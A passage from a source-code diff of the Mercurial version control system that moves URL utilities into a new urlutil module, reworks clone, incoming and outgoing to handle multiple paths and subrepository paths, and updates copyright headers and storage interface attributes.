if islocal(source): - defaultpath = os.path.abspath(util.urllocalpath(source)) + defaultpath = os.path.abspath(urlutil.urllocalpath(source)) else: defaultpath = source @@ -674,150 +671,158 @@ """ if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = parseurl(origsource, branch) + src = urlutil.get_clone_path(ui, source, branch) + origsource, source, branches = src srcpeer = peer(ui, peeropts, source) else: srcpeer = source.peer() # in case we were called with a localrepo branches = (None, branch or []) origsource = source = srcpeer.url() - revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) + srclock = destlock = cleandir = None + destpeer = None + try: + revs, checkout = addbranchrevs(srcpeer, srcpeer, branches, revs) - if dest is None: - dest = defaultdest(source) - if dest: - ui.status(_(b"destination directory: %s\n") % dest) - else: - dest = ui.expandpath(dest) + if dest is None: + dest = defaultdest(source) + if dest: + ui.status(_(b"destination directory: %s\n") % dest) + else: + dest = urlutil.get_clone_path(ui, dest)[0] - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = urlutil.urllocalpath(dest) + source = urlutil.urllocalpath(source) - if not dest: - raise error.InputError(_(b"empty destination path is not valid")) + if not dest: + raise error.InputError(_(b"empty destination path is not valid")) - destvfs = vfsmod.vfs(dest, expandpath=True) - if destvfs.lexists(): - if not destvfs.isdir(): - raise error.InputError(_(b"destination '%s' already exists") % dest) - elif destvfs.listdir(): - raise error.InputError(_(b"destination '%s' is not empty") % dest) + destvfs = vfsmod.vfs(dest, expandpath=True) + if destvfs.lexists(): + if not destvfs.isdir(): + raise error.InputError( + _(b"destination '%s' already exists") % dest + ) + elif destvfs.listdir(): + raise error.InputError( + _(b"destination '%s' is not empty") % dest + ) - createopts = {} - narrow = False - - if storeincludepats 
is not None: - narrowspec.validatepatterns(storeincludepats) - narrow = True + createopts = {} + narrow = False - if storeexcludepats is not None: - narrowspec.validatepatterns(storeexcludepats) - narrow = True + if storeincludepats is not None: + narrowspec.validatepatterns(storeincludepats) + narrow = True + + if storeexcludepats is not None: + narrowspec.validatepatterns(storeexcludepats) + narrow = True - if narrow: - # Include everything by default if only exclusion patterns defined. - if storeexcludepats and not storeincludepats: - storeincludepats = {b'path:.'} + if narrow: + # Include everything by default if only exclusion patterns defined. + if storeexcludepats and not storeincludepats: + storeincludepats = {b'path:.'} - createopts[b'narrowfiles'] = True + createopts[b'narrowfiles'] = True - if depth: - createopts[b'shallowfilestore'] = True + if depth: + createopts[b'shallowfilestore'] = True - if srcpeer.capable(b'lfs-serve'): - # Repository creation honors the config if it disabled the extension, so - # we can't just announce that lfs will be enabled. This check avoids - # saying that lfs will be enabled, and then saying it's an unknown - # feature. The lfs creation option is set in either case so that a - # requirement is added. If the extension is explicitly disabled but the - # requirement is set, the clone aborts early, before transferring any - # data. - createopts[b'lfs'] = True + if srcpeer.capable(b'lfs-serve'): + # Repository creation honors the config if it disabled the extension, so + # we can't just announce that lfs will be enabled. This check avoids + # saying that lfs will be enabled, and then saying it's an unknown + # feature. The lfs creation option is set in either case so that a + # requirement is added. If the extension is explicitly disabled but the + # requirement is set, the clone aborts early, before transferring any + # data. 
+ createopts[b'lfs'] = True - if extensions.disabled_help(b'lfs'): - ui.status( - _( - b'(remote is using large file support (lfs), but it is ' - b'explicitly disabled in the local configuration)\n' + if extensions.disabled_help(b'lfs'): + ui.status( + _( + b'(remote is using large file support (lfs), but it is ' + b'explicitly disabled in the local configuration)\n' + ) ) - ) - else: - ui.status( - _( - b'(remote is using large file support (lfs); lfs will ' - b'be enabled for this repository)\n' + else: + ui.status( + _( + b'(remote is using large file support (lfs); lfs will ' + b'be enabled for this repository)\n' + ) ) - ) - shareopts = shareopts or {} - sharepool = shareopts.get(b'pool') - sharenamemode = shareopts.get(b'mode') - if sharepool and islocal(dest): - sharepath = None - if sharenamemode == b'identity': - # Resolve the name from the initial changeset in the remote - # repository. This returns nullid when the remote is empty. It - # raises RepoLookupError if revision 0 is filtered or otherwise - # not available. If we fail to resolve, sharing is not enabled. - try: - with srcpeer.commandexecutor() as e: - rootnode = e.callcommand( - b'lookup', - { - b'key': b'0', - }, - ).result() + shareopts = shareopts or {} + sharepool = shareopts.get(b'pool') + sharenamemode = shareopts.get(b'mode') + if sharepool and islocal(dest): + sharepath = None + if sharenamemode == b'identity': + # Resolve the name from the initial changeset in the remote + # repository. This returns nullid when the remote is empty. It + # raises RepoLookupError if revision 0 is filtered or otherwise + # not available. If we fail to resolve, sharing is not enabled. 
+ try: + with srcpeer.commandexecutor() as e: + rootnode = e.callcommand( + b'lookup', + { + b'key': b'0', + }, + ).result() - if rootnode != nullid: - sharepath = os.path.join(sharepool, hex(rootnode)) - else: + if rootnode != nullid: + sharepath = os.path.join(sharepool, hex(rootnode)) + else: + ui.status( + _( + b'(not using pooled storage: ' + b'remote appears to be empty)\n' + ) + ) + except error.RepoLookupError: ui.status( _( b'(not using pooled storage: ' - b'remote appears to be empty)\n' + b'unable to resolve identity of remote)\n' ) ) - except error.RepoLookupError: - ui.status( - _( - b'(not using pooled storage: ' - b'unable to resolve identity of remote)\n' - ) + elif sharenamemode == b'remote': + sharepath = os.path.join( + sharepool, hex(hashutil.sha1(source).digest()) + ) + else: + raise error.Abort( + _(b'unknown share naming mode: %s') % sharenamemode ) - elif sharenamemode == b'remote': - sharepath = os.path.join( - sharepool, hex(hashutil.sha1(source).digest()) - ) - else: - raise error.Abort( - _(b'unknown share naming mode: %s') % sharenamemode - ) + + # TODO this is a somewhat arbitrary restriction. + if narrow: + ui.status( + _(b'(pooled storage not supported for narrow clones)\n') + ) + sharepath = None - # TODO this is a somewhat arbitrary restriction. 
- if narrow: - ui.status(_(b'(pooled storage not supported for narrow clones)\n')) - sharepath = None + if sharepath: + return clonewithshare( + ui, + peeropts, + sharepath, + source, + srcpeer, + dest, + pull=pull, + rev=revs, + update=update, + stream=stream, + ) - if sharepath: - return clonewithshare( - ui, - peeropts, - sharepath, - source, - srcpeer, - dest, - pull=pull, - rev=revs, - update=update, - stream=stream, - ) + srcrepo = srcpeer.local() - srclock = destlock = cleandir = None - srcrepo = srcpeer.local() - try: abspath = origsource if islocal(origsource): - abspath = os.path.abspath(util.urllocalpath(origsource)) + abspath = os.path.abspath(urlutil.urllocalpath(origsource)) if islocal(dest): cleandir = dest @@ -931,7 +936,7 @@ local.setnarrowpats(storeincludepats, storeexcludepats) narrowspec.copytoworkingcopy(local) - u = util.url(abspath) + u = urlutil.url(abspath) defaulturl = bytes(u) local.ui.setconfig(b'paths', b'default', defaulturl, b'clone') if not stream: @@ -978,7 +983,7 @@ destrepo = destpeer.local() if destrepo: template = uimod.samplehgrcs[b'cloned'] - u = util.url(abspath) + u = urlutil.url(abspath) u.passwd = None defaulturl = bytes(u) destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl)) @@ -1055,6 +1060,8 @@ shutil.rmtree(cleandir, True) if srcpeer is not None: srcpeer.close() + if destpeer and destpeer.local() is None: + destpeer.close() return srcpeer, destpeer @@ -1114,6 +1121,7 @@ assert stats.unresolvedcount == 0 if show_stats: _showstats(repo, stats, quietempty) + return False # naming conflict in updatetotally() @@ -1246,7 +1254,14 @@ def _incoming( - displaychlist, subreporecurse, ui, repo, source, opts, buffered=False + displaychlist, + subreporecurse, + ui, + repo, + source, + opts, + buffered=False, + subpath=None, ): """ Helper for incoming / gincoming. @@ -1254,17 +1269,33 @@ (remoterepo, incomingchangesetlist, displayer) parameters, and is supposed to contain only code that can't be unified. 
""" - source, branches = parseurl(ui.expandpath(source), opts.get(b'branch')) + srcs = urlutil.get_pull_paths(repo, ui, [source], opts.get(b'branch')) + srcs = list(srcs) + if len(srcs) != 1: + msg = _('for now, incoming supports only a single source, %d provided') + msg %= len(srcs) + raise error.Abort(msg) + source, branches = srcs[0] + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + source = bytes(subpath) + else: + p = urlutil.url(source) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + source = bytes(p) other = peer(repo, opts, source) - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) - revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) + cleanupfn = other.close + try: + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) + revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) - if revs: - revs = [other.lookup(rev) for rev in revs] - other, chlist, cleanupfn = bundlerepo.getremotechanges( - ui, repo, other, revs, opts[b"bundle"], opts[b"force"] - ) - try: + if revs: + revs = [other.lookup(rev) for rev in revs] + other, chlist, cleanupfn = bundlerepo.getremotechanges( + ui, repo, other, revs, opts[b"bundle"], opts[b"force"] + ) + if not chlist: ui.status(_(b"no changes found\n")) return subreporecurse() @@ -1280,7 +1311,7 @@ return 0 # exit code is zero since we found incoming changes -def incoming(ui, repo, source, opts): +def incoming(ui, repo, source, opts, subpath=None): def subreporecurse(): ret = 1 if opts.get(b'subrepos'): @@ -1304,67 +1335,115 @@ count += 1 displayer.show(other[n]) - return _incoming(display, subreporecurse, ui, repo, source, opts) + return _incoming( + display, subreporecurse, ui, repo, source, opts, subpath=subpath + ) -def _outgoing(ui, repo, dest, opts): - path = ui.paths.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.Abort( - _(b'default repository not configured!'), - hint=_(b"see 
'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = path.branch, opts.get(b'branch') or [] +def _outgoing(ui, repo, dests, opts, subpath=None): + out = set() + others = [] + for path in urlutil.get_push_paths(repo, ui, dests): + dest = path.pushloc or path.loc + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + dest = bytes(subpath) + else: + p = urlutil.url(dest) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + dest = bytes(p) + branches = path.branch, opts.get(b'branch') or [] + + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) + revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) + if revs: + revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) - revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) - if revs: - revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] + other = peer(repo, opts, dest) + try: + outgoing = discovery.findcommonoutgoing( + repo, other, revs, force=opts.get(b'force') + ) + o = outgoing.missing + out.update(o) + if not o: + scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) + others.append(other) + except: # re-raises + other.close() + raise + # make sure this is ordered by revision number + outgoing_revs = list(out) + cl = repo.changelog + outgoing_revs.sort(key=cl.rev) + return outgoing_revs, others - other = peer(repo, opts, dest) - outgoing = discovery.findcommonoutgoing( - repo, other, revs, force=opts.get(b'force') - ) - o = outgoing.missing - if not o: - scmutil.nochangesfound(repo.ui, repo, outgoing.excluded) - return o, other + +def _outgoing_recurse(ui, repo, dests, opts): + ret = 1 + if opts.get(b'subrepos'): + ctx = repo[None] + for subpath in sorted(ctx.substate): + sub = ctx.sub(subpath) + ret = min(ret, sub.outgoing(ui, dests, opts)) + return ret -def outgoing(ui, repo, dest, opts): - def recurse(): - ret = 1 - 
if opts.get(b'subrepos'): - ctx = repo[None] - for subpath in sorted(ctx.substate): - sub = ctx.sub(subpath) - ret = min(ret, sub.outgoing(ui, dest, opts)) - return ret - +def _outgoing_filter(repo, revs, opts): + """apply revision filtering/ordering option for outgoing""" limit = logcmdutil.getlimit(opts) - o, other = _outgoing(ui, repo, dest, opts) - if not o: - cmdutil.outgoinghooks(ui, repo, other, opts, o) - return recurse() - + no_merges = opts.get(b'no_merges') if opts.get(b'newest_first'): - o.reverse() - ui.pager(b'outgoing') - displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + revs.reverse() + if limit is None and not no_merges: + for r in revs: + yield r + return + count = 0 - for n in o: + cl = repo.changelog + for n in revs: if limit is not None and count >= limit: break - parents = [p for p in repo.changelog.parents(n) if p != nullid] - if opts.get(b'no_merges') and len(parents) == 2: + parents = [p for p in cl.parents(n) if p != nullid] + if no_merges and len(parents) == 2: continue count += 1 - displayer.show(repo[n]) - displayer.close() - cmdutil.outgoinghooks(ui, repo, other, opts, o) - recurse() - return 0 # exit code is zero since we found outgoing changes + yield n + + +def outgoing(ui, repo, dests, opts, subpath=None): + if opts.get(b'graph'): + logcmdutil.checkunsupportedgraphflags([], opts) + o, others = _outgoing(ui, repo, dests, opts, subpath=subpath) + ret = 1 + try: + if o: + ret = 0 + + if opts.get(b'graph'): + revdag = logcmdutil.graphrevs(repo, o, opts) + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer( + ui, repo, opts, buffered=True + ) + logcmdutil.displaygraph( + ui, repo, revdag, displayer, graphmod.asciiedges + ) + else: + ui.pager(b'outgoing') + displayer = logcmdutil.changesetdisplayer(ui, repo, opts) + for n in _outgoing_filter(repo, o, opts): + displayer.show(repo[n]) + displayer.close() + for oth in others: + cmdutil.outgoinghooks(ui, repo, oth, opts, o) + ret = min(ret, _outgoing_recurse(ui, 
repo, dests, opts)) + return ret # exit code is zero since we found outgoing changes + finally: + for oth in others: + oth.close() def verify(repo, level=None): diff --git a/mercurial/hgweb/__init__.py b/mercurial/hgweb/__init__.py --- a/mercurial/hgweb/__init__.py +++ b/mercurial/hgweb/__init__.py @@ -1,7 +1,7 @@ # hgweb/__init__.py - web interface to a mercurial repository # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005 Matt Mackall <mpm@selenic.com> +# Copyright 2005 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/common.py b/mercurial/hgweb/common.py --- a/mercurial/hgweb/common.py +++ b/mercurial/hgweb/common.py @@ -1,7 +1,7 @@ # hgweb/common.py - Utility functions needed by hgweb_mod and hgwebdir_mod # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgweb_mod.py b/mercurial/hgweb/hgweb_mod.py --- a/mercurial/hgweb/hgweb_mod.py +++ b/mercurial/hgweb/hgweb_mod.py @@ -1,7 +1,7 @@ # hgweb/hgweb_mod.py - Web interface for a repository. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/hgwebdir_mod.py b/mercurial/hgweb/hgwebdir_mod.py --- a/mercurial/hgweb/hgwebdir_mod.py +++ b/mercurial/hgweb/hgwebdir_mod.py @@ -1,7 +1,7 @@ # hgweb/hgwebdir_mod.py - Web interface for a directory of repositories. 
# # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -1,7 +1,7 @@ # hgweb/request.py - An http request from either CGI or the standalone server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -17,6 +17,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) class multidict(object): @@ -184,7 +187,7 @@ reponame = env.get(b'REPO_NAME') if altbaseurl: - altbaseurl = util.url(altbaseurl) + altbaseurl = urlutil.url(altbaseurl) # https://www.python.org/dev/peps/pep-0333/#environ-variables defines # the environment variables. diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -1,7 +1,7 @@ # hgweb/server.py - The standalone hg web server. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -28,6 +28,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) httpservermod = util.httpserver socketserver = util.socketserver @@ -431,7 +434,7 @@ sys.setdefaultencoding(oldenc) address = ui.config(b'web', b'address') - port = util.getport(ui.config(b'web', b'port')) + port = urlutil.getport(ui.config(b'web', b'port')) try: return cls(ui, app, (address, port), handler) except socket.error as inst: diff --git a/mercurial/hgweb/webcommands.py b/mercurial/hgweb/webcommands.py --- a/mercurial/hgweb/webcommands.py +++ b/mercurial/hgweb/webcommands.py @@ -1,6 +1,6 @@ # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hgweb/webutil.py b/mercurial/hgweb/webutil.py --- a/mercurial/hgweb/webutil.py +++ b/mercurial/hgweb/webutil.py @@ -1,7 +1,7 @@ # hgweb/webutil.py - utility library for the web interface. # # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/hook.py b/mercurial/hook.py --- a/mercurial/hook.py +++ b/mercurial/hook.py @@ -1,6 +1,6 @@ # hook.py - hook support for mercurial # -# Copyright 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -1,6 +1,6 @@ # httpconnection.py - urllib2 handler for new http support # -# Copyright 2005, 2006, 2007, 2008 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006, 2007, 2008 Olivia Mackall <olivia@selenic.com> # Copyright 2006, 2007 Alexis S. L. Carvalho <alexis@cecm.usp.br> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # Copyright 2011 Google, Inc. @@ -18,6 +18,10 @@ pycompat, util, ) +from .utils import ( + urlutil, +) + urlerr = util.urlerr urlreq = util.urlreq @@ -99,7 +103,7 @@ if not prefix: continue - prefixurl = util.url(prefix) + prefixurl = urlutil.url(prefix) if prefixurl.user and prefixurl.user != user: # If a username was set in the prefix, it must match the username in # the URI. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -1,6 +1,6 @@ # httppeer.py - HTTP repository proxy classes for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com> # # This software may be used and distributed according to the terms of the @@ -38,6 +38,7 @@ from .utils import ( cborutil, stringutil, + urlutil, ) httplib = util.httplib @@ -171,9 +172,9 @@ # Send arguments via HTTP headers. if headersize > 0: # The headers can typically carry more data than the URL. - encargs = urlreq.urlencode(sorted(args.items())) + encoded_args = urlreq.urlencode(sorted(args.items())) for header, value in encodevalueinheaders( - encargs, b'X-HgArg', headersize + encoded_args, b'X-HgArg', headersize ): headers[header] = value # Send arguments via query string (Mercurial <1.9). 
@@ -305,7 +306,7 @@ except httplib.HTTPException as inst: ui.debug( b'http error requesting %s\n' - % util.hidepassword(req.get_full_url()) + % urlutil.hidepassword(req.get_full_url()) ) ui.traceback() raise IOError(None, inst) @@ -352,14 +353,14 @@ except AttributeError: proto = pycompat.bytesurl(resp.headers.get('content-type', '')) - safeurl = util.hidepassword(baseurl) + safeurl = urlutil.hidepassword(baseurl) if proto.startswith(b'application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. if not proto.startswith(b'application/mercurial-'): - ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl)) + ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl)) msg = _( b"'%s' does not appear to be an hg repository:\n" b"---%%<--- (%s)\n%s\n---%%<---\n" @@ -1058,7 +1059,7 @@ ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ - u = util.url(path) + u = urlutil.url(path) if u.query or u.fragment: raise error.Abort( _(b'unsupported URL component: "%s"') % (u.query or u.fragment) diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -1,6 +1,6 @@ # i18n.py - internationalization support for mercurial # -# Copyright 2005, 2006 Matt Mackall <mpm@selenic.com> +# Copyright 2005, 2006 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -19,6 +19,13 @@ pycompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Callable, + List, + ) + + # modelled after templater.templatepath: if getattr(sys, 'frozen', None) is not None: module = pycompat.sysexecutable @@ -40,7 +47,10 @@ try: import ctypes + # pytype: disable=module-attr langid = ctypes.windll.kernel32.GetUserDefaultUILanguage() + # pytype: enable=module-attr + _languages = [locale.windows_locale[langid]] except (ImportError, AttributeError, KeyError): # ctypes not found or unknown langid @@ -51,7 +61,7 @@ localedir = os.path.join(datapath, 'locale') t = gettextmod.translation('hg', localedir, _languages, fallback=True) try: - _ugettext = t.ugettext + _ugettext = t.ugettext # pytype: disable=attribute-error except AttributeError: _ugettext = t.gettext @@ -60,6 +70,7 @@ def gettext(message): + # type: (bytes) -> bytes """Translate message. The message is looked up in the catalog to get a Unicode string, @@ -77,7 +88,7 @@ if message not in cache: if type(message) is pycompat.unicode: # goofy unicode docstrings in test - paragraphs = message.split(u'\n\n') + paragraphs = message.split(u'\n\n') # type: List[pycompat.unicode] else: # should be ascii, but we have unicode docstrings in test, which # are converted to utf-8 bytes on Python 3. @@ -110,6 +121,6 @@ if _plain(): - _ = lambda message: message + _ = lambda message: message # type: Callable[[bytes], bytes] else: _ = gettext diff --git a/mercurial/interfaces/dirstate.py b/mercurial/interfaces/dirstate.py --- a/mercurial/interfaces/dirstate.py +++ b/mercurial/interfaces/dirstate.py @@ -8,7 +8,7 @@ class idirstate(interfaceutil.Interface): - def __init__(opener, ui, root, validate, sparsematchfn): + def __init__(opener, ui, root, validate, sparsematchfn, nodeconstants): """Create a new dirstate object. 
opener is an open()-like callable that can be used to open the diff --git a/mercurial/interfaces/repository.py b/mercurial/interfaces/repository.py --- a/mercurial/interfaces/repository.py +++ b/mercurial/interfaces/repository.py @@ -453,6 +453,10 @@ """ ) + sidedata = interfaceutil.Attribute( + """Raw sidedata bytes for the given revision.""" + ) + class ifilerevisionssequence(interfaceutil.Interface): """Contains index data for all revisions of a file. @@ -519,6 +523,10 @@ * Metadata to facilitate storage. """ + nullid = interfaceutil.Attribute( + """node for the null revision for use as delta base.""" + ) + def __len__(): """Obtain the number of revisions stored for this file.""" @@ -734,7 +742,7 @@ flags=0, cachedelta=None, ): - """Add a new revision to the store. + """Add a new revision to the store and return its number. This is similar to ``add()`` except it operates at a lower level. @@ -769,7 +777,14 @@ ``nullid``, in which case the header from the delta can be ignored and the delta used as the fulltext. - ``addrevisioncb`` should be called for each node as it is committed. + ``alwayscache`` instructs the lower layers to cache the content of the + newly added revision, even if it needs to be explicitly computed. + This used to be the default when ``addrevisioncb`` was provided up to + Mercurial 5.8. + + ``addrevisioncb`` should be called for each new rev as it is committed. + ``duplicaterevisioncb`` should be called for all revs with a + pre-existing node. ``maybemissingparents`` is a bool indicating whether the incoming data may reference parents/ancestor revisions that aren't present. @@ -1132,6 +1147,10 @@ class imanifeststorage(interfaceutil.Interface): """Storage interface for manifest data.""" + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + tree = interfaceutil.Attribute( """The path to the directory this manifest tracks. @@ -1355,6 +1374,10 @@ tree manifests. 
""" + nodeconstants = interfaceutil.Attribute( + """nodeconstants used by the current repository.""" + ) + def __getitem__(node): """Obtain a manifest instance for a given binary node. @@ -1423,6 +1446,13 @@ This currently captures the reality of things - not how things should be. """ + nodeconstants = interfaceutil.Attribute( + """Constant nodes matching the hash function used by the repository.""" + ) + nullid = interfaceutil.Attribute( + """null revision for the hash function used by the repository.""" + ) + supportedformats = interfaceutil.Attribute( """Set of requirements that apply to stream clone. @@ -1641,6 +1671,14 @@ def revbranchcache(): pass + def register_changeset(rev, changelogrevision): + """Extension point for caches for new nodes. + + Multiple consumers are expected to need parts of the changelogrevision, + so it is provided as optimization to avoid duplicate lookups. A simple + cache would be fragile when other revisions are accessed, too.""" + pass + def branchtip(branchtip, ignoremissing=False): """Return the tip node for a given branch.""" @@ -1813,6 +1851,12 @@ def savecommitmessage(text): pass + def register_sidedata_computer(kind, category, keys, computer): + pass + + def register_wanted_sidedata(category): + pass + class completelocalrepository( ilocalrepositorymain, ilocalrepositoryfilestorage diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -1,6 +1,6 @@ # localrepo.py - read/write repository class for mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -21,6 +21,7 @@ hex, nullid, nullrev, + sha1nodeconstants, short, ) from .pycompat import ( @@ -49,6 +50,7 @@ match as matchmod, mergestate as mergestatemod, mergeutil, + metadata as metadatamod, namespaces, narrowspec, obsolete, @@ -71,6 +73,7 @@ txnutil, util, vfs as vfsmod, + wireprototypes, ) from .interfaces import ( @@ -82,9 +85,13 @@ hashutil, procutil, stringutil, + urlutil, ) -from .revlogutils import constants as revlogconst +from .revlogutils import ( + concurrency_checker as revlogchecker, + constants as revlogconst, +) release = lockmod.release urlerr = util.urlerr @@ -270,6 +277,11 @@ caps = moderncaps.copy() self._repo = repo.filtered(b'served') self.ui = repo.ui + + if repo._wanted_sidedata: + formatted = bundle2.format_remote_wanted_sidedata(repo) + caps.add(b'exp-wanted-sidedata=' + formatted) + self._caps = repo._restrictcapabilities(caps) # Begin of _basepeer interface. @@ -313,7 +325,13 @@ ) def getbundle( - self, source, heads=None, common=None, bundlecaps=None, **kwargs + self, + source, + heads=None, + common=None, + bundlecaps=None, + remote_sidedata=None, + **kwargs ): chunks = exchange.getbundlechunks( self._repo, @@ -321,6 +339,7 @@ heads=heads, common=common, bundlecaps=bundlecaps, + remote_sidedata=remote_sidedata, **kwargs )[1] cb = util.chunkbuffer(chunks) @@ -452,7 +471,7 @@ # ``.hg/`` for ``relshared``. 
sharedpath = hgvfs.read(b'sharedpath').rstrip(b'\n') if requirementsmod.RELATIVE_SHARED_REQUIREMENT in requirements: - sharedpath = hgvfs.join(sharedpath) + sharedpath = util.normpath(hgvfs.join(sharedpath)) sharedvfs = vfsmod.vfs(sharedpath, realpath=True) @@ -939,11 +958,10 @@ def makestore(requirements, path, vfstype): """Construct a storage object for a repository.""" - if b'store' in requirements: - if b'fncache' in requirements: - return storemod.fncachestore( - path, vfstype, b'dotencode' in requirements - ) + if requirementsmod.STORE_REQUIREMENT in requirements: + if requirementsmod.FNCACHE_REQUIREMENT in requirements: + dotencode = requirementsmod.DOTENCODE_REQUIREMENT in requirements + return storemod.fncachestore(path, vfstype, dotencode) return storemod.encodedstore(path, vfstype) @@ -971,7 +989,7 @@ # opener options for it because those options wouldn't do anything # meaningful on such old repos. if ( - b'revlogv1' in requirements + requirementsmod.REVLOGV1_REQUIREMENT in requirements or requirementsmod.REVLOGV2_REQUIREMENT in requirements ): options.update(resolverevlogstorevfsoptions(ui, requirements, features)) @@ -995,12 +1013,12 @@ options = {} options[b'flagprocessors'] = {} - if b'revlogv1' in requirements: + if requirementsmod.REVLOGV1_REQUIREMENT in requirements: options[b'revlogv1'] = True if requirementsmod.REVLOGV2_REQUIREMENT in requirements: options[b'revlogv2'] = True - if b'generaldelta' in requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in requirements: options[b'generaldelta'] = True # experimental config: format.chunkcachesize @@ -1196,8 +1214,8 @@ # being successful (repository sizes went up due to worse delta # chains), and the code was deleted in 4.6. 
